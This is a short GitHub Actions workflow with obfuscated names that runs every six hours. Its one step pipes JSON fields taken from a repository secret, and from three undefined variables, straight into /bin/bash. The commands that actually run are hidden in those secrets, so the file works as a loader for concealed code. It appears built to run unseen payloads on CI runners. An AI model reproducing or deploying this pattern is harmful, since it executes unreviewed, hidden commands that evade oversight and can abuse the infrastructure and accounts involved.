name: langzhengdong5678

on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: langzhengdong5678
        env:
          exycj827: ${{ secrets.exycj827 }}
        run: |
          echo $exycj827 | jq -r .sw6 | /bin/bash
          echo $fp3141 | jq -r .ee5 | /bin/bash
          echo $c85451 | jq -r .il3 | /bin/bash
          echo $gt92494 | jq -r .xjxu66494 | /bin/bash

